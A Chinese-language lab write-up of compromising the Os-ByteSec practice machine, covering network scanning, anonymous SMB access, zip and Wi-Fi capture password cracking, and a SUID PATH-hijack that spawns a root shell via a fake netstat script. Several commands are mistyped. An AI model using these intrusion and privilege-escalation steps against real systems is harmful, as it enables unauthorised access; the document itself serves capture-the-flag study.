Os-ByteSec靶机

首先将kali桥接到virtualbox的网卡上。打开kali查看本机ip然后nmap搜索同一网段下有哪些ip。nmap -sP 192.168.56.1/24

然后打开靶机,用kali再扫一遍,发现多出一个ip,就是靶机的ip了,靶机ip为:192.168.56.101

用namp查询靶机的开放端口,,查询到80,139.445.2525端口是开放的

然后进入网站观察有无漏洞,192.168.56.101:80

除了几张图片就没有什么收获,于是去百度搜索其他端口的漏洞

139和445有名的就是那个永恒之蓝也是smb漏洞,但这是Ubuntu不是windows所以,经百度查询输入命令:mbclient//192.168.56.101/myshare -U smb直接进入,无密码,得到两个文件,下载到本地解压但是需要密码,于是用fcrackzip爆破,得到zip密码hacker1

解压得到文件secret.jpg和user.cap,图片没什么东西,使用aircrack-ng破解user.cap文件。得到用户名和密码。用这个账号密码登入靶机,得到user.txt,打开得到第一个flag,user.flag


第二个root.flag就是需要提升权限去获得了,再度娘寻找大部分linux提权的文章,找到一篇与我此刻情况差不多的文章https://www.anquanke.com/post/id/146799

按照作者的方法走,在find命令的帮助下不浪费时间的搜索具有SUID或4000权限的文件。find / -perm -u=s -type f2>/dev/null


然后我们进入/usr/bin,看到netscan比较可疑,运行这个文件,在这里它看起来像文件netscan试图运行netstat,在查看端口状态。再提权

cd/tmp       

echo"/bin/sh"> netstat                      (创建文件netstat)

chmod 777 netstat                            

echo$PATH                                       (查看当前环境变量)

export PATH=/tmp:$PATH                 (设置环境变量PATH)

cd/usr/bin           

./netscan 

whoami

root


此时已经变成root权限,进入root目录,ls查看所有文件发现有个root.txt.这就是另一个flag了

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

相关阅读更多精彩内容

  • FTP服务概述 简单FTP构建及访问 VSFTP服务基础 用户禁锢、黑白名单 FTP并发及带宽限制 一、FTP服务...
    紫_轩阅读 7,988评论 3 25
  • 1、第八章 Samba服务器2、第八章 NFS服务器3、第十章 Linux下DNS服务器配站点,域名解析概念命令:...
    哈熝少主阅读 3,873评论 0 10
  • win7 cmd管理员权限设置 net localgroup administrators 用户名 /add 把“...
    f675b1a02698阅读 5,489评论 0 11
  • 听着雨,淅淅沥沥。越来越喜欢安静的我,似乎游走在人群和自我之间,在热闹与孤寂的中间线上不偏不倚。 似乎到了对什么都...
    锦恋公子阅读 219评论 3 0
  • 需求:自动复制一段内容到剪切板, 让用户可以在其他客户端粘贴(发小广告做推广经常要用吧) window.clipb...
    殷众阅读 24,349评论 9 11

友情链接更多精彩内容